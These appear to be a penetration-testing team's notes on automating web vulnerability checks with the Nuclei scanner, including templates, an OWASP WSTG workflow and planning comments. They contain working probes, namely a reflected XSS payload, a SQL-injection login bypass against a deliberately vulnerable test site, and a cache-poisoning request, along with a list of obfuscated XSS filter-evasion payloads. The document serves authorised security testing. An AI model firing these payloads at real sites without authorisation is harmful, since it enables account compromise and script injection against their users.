Nuclei summarized:
- Same concept as Nessus, but free and community-driven, with checks written as templates. More than 2000 templates so far and still growing.
- Scanning can be customized by creating profiles and workflows.

What did we do:
- Looked at other templates to understand the concept and wrote some simple PoCs for XSS and SQLi.

Future plans:
- Write new templates to automate as much as possible for pentest assignments.
- Workflows allow you to chain multiple templates (so multiple vulnerability checks) and run them sequentially.
- Workflows can be customized further: for example, conditional template execution based on the technologies (and versions) detected on the target.
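As an added example of the conditional execution described above (this is not a template from the note or from the Nuclei project), a workflow that runs the technology-detection template first and only launches follow-up templates for what it found. Subtemplates are keyed on the `name` of a matcher in the parent template, so the matcher names `wordpress` and `nginx`, the template path `technologies/tech-detect.yaml` and the directory `misconfiguration/` are assumptions that must be checked against your local copy of nuclei-templates:

```yaml
id: conditional-tech-workflow

info:
  name: Conditional workflow keyed on detected technologies
  author: example   # added example, not from the note
  description: |
    Runs tech-detect first. Each subtemplates block is executed only when
    the parent template's matcher with that name fired on the target, so
    WordPress checks never run against a host that is not WordPress.

workflows:
  # Path assumed relative to the nuclei-templates directory.
  - template: technologies/tech-detect.yaml
    matchers:
      # Matcher name assumed; it must equal a matcher `name` in tech-detect.yaml.
      - name: wordpress
        subtemplates:
          - tags: wordpress            # run every template tagged "wordpress"
      - name: nginx
        subtemplates:
          - template: misconfiguration/   # directory path assumed; all templates in it run
```

Run it with `nuclei -w conditional-tech-workflow.yaml -u https://target.example`; `nuclei -validate -w conditional-tech-workflow.yaml` checks the syntax without scanning anything. Because the follow-up templates are gated on a detection result, a workflow like this sends far fewer irrelevant requests than running the whole template directory, which also keeps the scan's noise level down for the blue team watching the logs.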
# Nuclei Templates
- Look for low-hanging fruits
  - header misconfiguration
    - https://github.com/projectdiscovery/nuclei-templates/pull/2481/files/0ef631dce102db77f5d848cc97eb3da0cbc77e7b#diff-deb2a989e89059f886e99133da30d32a767e72cc0622237487139c4e1a597bf1
  - cookie protection
    - What are we thinking of here? Nuclei doesn't authenticate afaik, so how would we check the session cookies for flags in Nuclei? I think Burp is better suited for this part.
  - server fingerprinting
    - Nuclei has modules for detecting Apache, nginx etc. already. So I guess this part is not necessary unless there are further thoughts on this?
  - accepted HTTP methods
    - I haven't found any templates for testing TRACE/OPTIONS etc., so maybe some modules for this? Burp does this already though.
  - session cookie strength / randomization
  - interesting files
- Look for XSS Injections
  - Reflected
  - Stored
  - DOM-based
  - Universal
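For the "accepted HTTP methods" item above (WSTG-CONF-06 in the workflow further down), here is an added example template that is not from the note or from the nuclei-templates repository. The first request sends a TRACE with a canary header and reports a finding only if the server answers 200 and echoes the canary back, which is what an enabled TRACE method does; the second sends OPTIONS and extracts the `Allow` header so the advertised method list lands in the scan output for review. The header name `X-Canary`, the canary value and the template id are constructed for this example:

```yaml
id: http-methods-check

info:
  name: HTTP TRACE enabled / OPTIONS allow list
  author: example   # added example, not from the note
  severity: info
  tags: misconfig,wstg-conf-06

requests:
  # Request 1: TRACE echoes the request back to the client. A 200 response
  # whose body contains our canary header means TRACE is enabled.
  - raw:
      - |
        TRACE / HTTP/1.1
        Host: {{Hostname}}
        X-Canary: sensecon21
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body
        case-insensitive: true    # some proxies lower-case header names on the echo
        words:
          - "x-canary: sensecon21"

  # Request 2: OPTIONS. Nothing is matched here; the Allow header is only
  # extracted (kval uses header names with "-" replaced by "_").
  - raw:
      - |
        OPTIONS / HTTP/1.1
        Host: {{Hostname}}
    extractors:
      - type: kval
        kval:
          - allow
```

Run it with `nuclei -t http-methods-check.yaml -u https://target.example`. Requiring both the status and the echoed canary (`matchers-condition: and`) avoids flagging servers that answer TRACE with a 200 error page; on the remediation side, the fix is to disable TRACE in the server configuration and keep the `Allow` list down to the methods the application actually uses.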
# PoC Showcase Templates
## XSS
```yaml=
id: acunetix-testphp-rxss
info:
  name: Reflected XSS
  author: ocd
  severity: high
requests:
  # PoC bound to the Acunetix test site. Nuclei's HTTP client recomputes
  # Content-Length from the body, so the value below is not what goes on the wire.
  - raw:
      - |
        POST /search.php?test=query HTTP/1.1
        Host: testphp.vulnweb.com
        Content-Length: 75
        Cache-Control: max-age=0
        Upgrade-Insecure-Requests: 1
        Origin: http://testphp.vulnweb.com
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Referer: http://testphp.vulnweb.com/
        Accept-Encoding: gzip, deflate
        Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
        Connection: close

        searchFor=%3Cscript%3Ealert%28%22sensecon21%22%29%3C%2Fscript%3E&goButton=go
    # Fires whenever the canary word is reflected in the response.
    matchers:
      - type: word
        words:
          - "sensecon21"
```
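The matcher in the PoC above fires whenever the canary `sensecon21` comes back in the response, which also happens when the application reflects the search term safely HTML-encoded (`&lt;script&gt;...`), so it reports a finding on a page that is not exploitable. As an added example (not from the note), the same probe with a stricter matcher: the finding is only reported when the response is HTML and contains the payload unencoded, and `{{Hostname}}` replaces the hard-coded host so the template runs against any target. The template id and author are constructed for this example:

```yaml
id: acunetix-testphp-rxss-strict

info:
  name: Reflected XSS (stricter matcher)
  author: example   # added example, not from the note
  severity: high
  description: |
    Same probe as the PoC, but a finding is only reported when the payload
    is reflected unencoded into an HTML response. Content-Length is left
    out on purpose; Nuclei computes it from the body.

requests:
  - raw:
      - |
        POST /search.php?test=query HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        searchFor=%3Cscript%3Ealert%28%22sensecon21%22%29%3C%2Fscript%3E&goButton=go
    # All three matchers must hold for the template to report.
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: header
        words:
          - "text/html"          # a JSON or plain-text reflection is not an XSS
      - type: word
        part: body
        words:
          - '<script>alert("sensecon21")</script>'   # exact, unencoded reflection
```

The difference shows up on any endpoint that echoes input through an output encoder: the loose PoC matcher flags it, the strict one stays quiet. For a framework that only partially encodes (say, `<` but not `"`), neither matcher is enough and the response still has to be read by hand, which is the same caveat the note raises for cookie checks.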

## SQL Injection
```yaml=
id: acunetix-testphp-sqli
info:
  name: SQL Injection
  author: ocd
  severity: high
requests:
  # PoC bound to the Acunetix test site; the injected condition short-circuits
  # the login check and the matcher looks for data that is only returned then.
  - raw:
      - |
        POST /userinfo.php HTTP/1.1
        Host: testphp.vulnweb.com
        Content-Length: 27
        Cache-Control: max-age=0
        Upgrade-Insecure-Requests: 1
        Origin: http://testphp.vulnweb.com
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Referer: http://testphp.vulnweb.com/login.php
        Accept-Encoding: gzip, deflate
        Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
        Connection: close

        uname=test%27+OR+%271&pass=
    matchers:
      - type: word
        words:
          - "John Smith"
```

# External templates by others
- DOM XSS: https://github.com/geeknik/the-nuclei-templates/blob/main/dom-xss.yaml
- Cache poisoning:
```yaml=
id: cache-poisoning
info:
  name: Cache Poisoning
  author: melbadry9 & xelkomy
  severity: low
requests:
  # Two requests: the first tries to get the injected host name cached,
  # the second fetches the same URL without the headers. req-condition: true
  # makes both responses available to the DSL matcher as body_1 / body_2.
  - raw:
      - |
        GET /?mel=9 HTTP/1.1
        Host: {{Hostname}}
        X-Forwarded-Prefix: cache.melbadry9.com
        X-Forwarded-Host: cache.melbadry9.com
        X-Forwarded-For: cache.melbadry9.com
      - |
        GET /?mel=9 HTTP/1.1
        Host: {{Hostname}}
    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "cache.melbadry9.com") == true'
```
(The `Host: {{Hostname}}` lines were missing from the copy pasted here and are required for a raw HTTP/1.1 request; Nuclei fills the placeholder from the target URL.)
# Payloads/data for modules:
- XSS:
```
\\\\%22-alert(1)}//
\'-alert(1)//
onload=alert(1) x="
\"}})})-confirm`1`/*/
[].pop.constructor`alert\x281\x29```
\"}})})-confirm`1`(a=>{({b:{/*///
`/alert?.(1)'"><Svg/OnLoad='`
alert?.(document?.domain)[document?.domain]?.map?.(alert)
top?.[/ale/?.source+/rt/?.source]?.(document?.[/dom/?.source+/ain/?.source])
<Svg/Onload=top%5B"al"%2B"ert%5D(1)//
%27onfocus="1>1<alert(1)//contenteditable/autofocus=%27
<k>Javas<k></k>cript:al<k></k>ert(1)</k>
<Svg id=innerText OnLoad=location=all[11][id]>
```
Source: https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
# Workflows
```yaml=
# OWASP WSTG
id: owasp-wstg-workflow
info:
  name: OWASP WSTG Workflow
  author: Sensepost
workflows:
  #########################
  # Information Gathering #
  #########################
  # WSTG-INFO-01 Conduct Search Engine Discovery Reconnaissance for Information Leakage
  #   Currently manual testing/verification
  # WSTG-INFO-02 Fingerprint Web Server
  - template: technologies/
  # WSTG-INFO-03 Review Webserver Metafiles for Information Leakage
  # WSTG-INFO-04 Enumerate Applications on Webserver
  # WSTG-INFO-05 Review Webpage Content for Information Leakage
  # WSTG-INFO-06 Identify application entry points
  # WSTG-INFO-07 Map execution paths through application
  # WSTG-INFO-08 Fingerprint Web Application Framework
  # WSTG-INFO-09 Fingerprint Web Application
  # WSTG-INFO-10 Map Application Architecture
  ###############################################
  # Configuration and Deploy Management Testing #
  ###############################################
  # WSTG-CONF-01 Test Network Infrastructure Configuration
  # WSTG-CONF-02 Test Application Platform Configuration
  # WSTG-CONF-03 Test File Extensions Handling for Sensitive Information
  # WSTG-CONF-04 Review Old Backup and Unreferenced Files for Sensitive Information
  # WSTG-CONF-05 Enumerate Infrastructure and Application Admin Interfaces
  # WSTG-CONF-06 Test HTTP Methods
  # WSTG-CONF-07 Test HTTP Strict Transport Security
  # WSTG-CONF-08 Test RIA cross domain policy
  # WSTG-CONF-09 Test File Permission
  # WSTG-CONF-10 Test for Subdomain Takeover
  # WSTG-CONF-11 Test Cloud Storage
  ###############################
  # Identity Management Testing #
  ###############################
  # WSTG-IDNT-01 Test Role Definitions
  # WSTG-IDNT-02 Test User Registration Process
  # WSTG-IDNT-03 Test Account Provisioning Process
  # WSTG-IDNT-04 Testing for Account Enumeration and Guessable User Account
  # WSTG-IDNT-05 Testing for Weak or unenforced username policy
  ##########################
  # Authentication Testing #
  ##########################
  # WSTG-ATHN-01 Testing for Credentials Transported over an Encrypted Channel
  # WSTG-ATHN-02 Testing for Default Credentials
  # WSTG-ATHN-03 Testing for Weak Lock Out Mechanism
  # WSTG-ATHN-04 Testing for Bypassing Authentication Schema
  # WSTG-ATHN-05 Testing for Vulnerable Remember Password
  # WSTG-ATHN-06 Testing for Browser Cache Weaknesses
  # WSTG-ATHN-07 Testing for Weak Password Policy
  # WSTG-ATHN-08 Testing for Weak Security Question Answer
  # WSTG-ATHN-09 Testing for Weak Password Change or Reset Functionalities
  # WSTG-ATHN-10 Testing for Weaker Authentication in Alternative Channel
  #########################
  # Authorization Testing #
  #########################
  # WSTG-ATHZ-01 Testing Directory Traversal File Include
  # WSTG-ATHZ-02 Testing for Bypassing Authorization Schema
  # WSTG-ATHZ-03 Testing for Privilege Escalation
  # WSTG-ATHZ-04 Testing for Insecure Direct Object References
  ##############################
  # Session Management Testing #
  ##############################
  # WSTG-SESS-01 Testing for Session Management Schema
  # WSTG-SESS-02 Testing for Cookies Attributes
  # WSTG-SESS-03 Testing for Session Fixation
  # WSTG-SESS-04 Testing for Exposed Session Variables
  # WSTG-SESS-05 Testing for Cross Site Request Forgery
  # WSTG-SESS-06 Testing for Logout Functionality
  # WSTG-SESS-07 Testing Session Timeout
  # WSTG-SESS-08 Testing for Session Puzzling
  # WSTG-SESS-09 Testing for Session Hijacking
  ###########################
  # Data Validation Testing #
  ###########################
  # WSTG-INPV-01 Testing for Reflected Cross Site Scripting
  # WSTG-INPV-02 Testing for Stored Cross Site Scripting
  # WSTG-INPV-03 Testing for HTTP Verb Tampering
  # WSTG-INPV-04 Testing for HTTP Parameter Pollution
  # WSTG-INPV-05 Testing for SQL Injection
  - template: sqli.yaml   # CHANGE_PATH_FOR_POC: path to the SQL Injection PoC template above
  # WSTG-INPV-06 Testing for LDAP Injection
  # WSTG-INPV-07 Testing for XML Injection
  # WSTG-INPV-08 Testing for SSI Injection
  # WSTG-INPV-09 Testing for XPath Injection
  # WSTG-INPV-10 Testing for IMAP SMTP Injection
  # WSTG-INPV-11 Testing for Code Injection
  # WSTG-INPV-12 Testing for Command Injection
  # WSTG-INPV-13 Testing for Format String Injection
  # WSTG-INPV-14 Testing for Incubated Vulnerability
  # WSTG-INPV-15 Testing for HTTP Splitting Smuggling
  # WSTG-INPV-16 Testing for HTTP Incoming Requests
  # WSTG-INPV-17 Testing for Host Header Injection
  # WSTG-INPV-18 Testing for Server-side Template Injection
  # WSTG-INPV-19 Testing for Server-Side Request Forgery
  ##################
  # Error Handling #
  ##################
  # WSTG-ERRH-01 Testing for Improper Error Handling
  # WSTG-ERRH-02 Testing for Stack Traces
  ################
  # Cryptography #
  ################
  # WSTG-CRYP-01 Testing for Weak Transport Layer Security
  # WSTG-CRYP-02 Testing for Padding Oracle
  # WSTG-CRYP-03 Testing for Sensitive Information Sent via Unencrypted Channels
  # WSTG-CRYP-04 Testing for Weak Encryption
  ##################
  # Business logic #
  ##################
  # WSTG-BUSL-01 Test Business Logic Data Validation
  # WSTG-BUSL-02 Test Ability to Forge Requests
  # WSTG-BUSL-03 Test Integrity Checks
  # WSTG-BUSL-04 Test for Process Timing
  # WSTG-BUSL-05 Test Number of Times a Function Can be Used Limits
  # WSTG-BUSL-06 Testing for the Circumvention of Work Flows
  # WSTG-BUSL-07 Test Defenses Against Application Mis-use
  # WSTG-BUSL-08 Test Upload of Unexpected File Types
  # WSTG-BUSL-09 Test Upload of Malicious Files
  #######################
  # Client Side Testing #
  #######################
  # WSTG-CLNT-01 Testing for DOM-Based Cross Site Scripting
  # WSTG-CLNT-02 Testing for JavaScript Execution
  - template: reflected-xss.yaml   # CHANGE_PATH_FOR_POC: path to the Reflected XSS PoC template above
  # WSTG-CLNT-03 Testing for HTML Injection
  # WSTG-CLNT-04 Testing for Client Side URL Redirect
  # WSTG-CLNT-05 Testing for CSS Injection
  # WSTG-CLNT-06 Testing for Client Side Resource Manipulation
  # WSTG-CLNT-07 Test Cross Origin Resource Sharing
  # WSTG-CLNT-08 Testing for Cross Site Flashing
  # WSTG-CLNT-09 Testing for Clickjacking
  # WSTG-CLNT-10 Testing WebSockets
  # WSTG-CLNT-11 Test Web Messaging
  # WSTG-CLNT-12 Testing Browser Storage
  # WSTG-CLNT-13 Testing for Cross Site Script Inclusion
  ###############
  # API Testing #
  ###############
  # WSTG-APIT-01 Testing GraphQL
```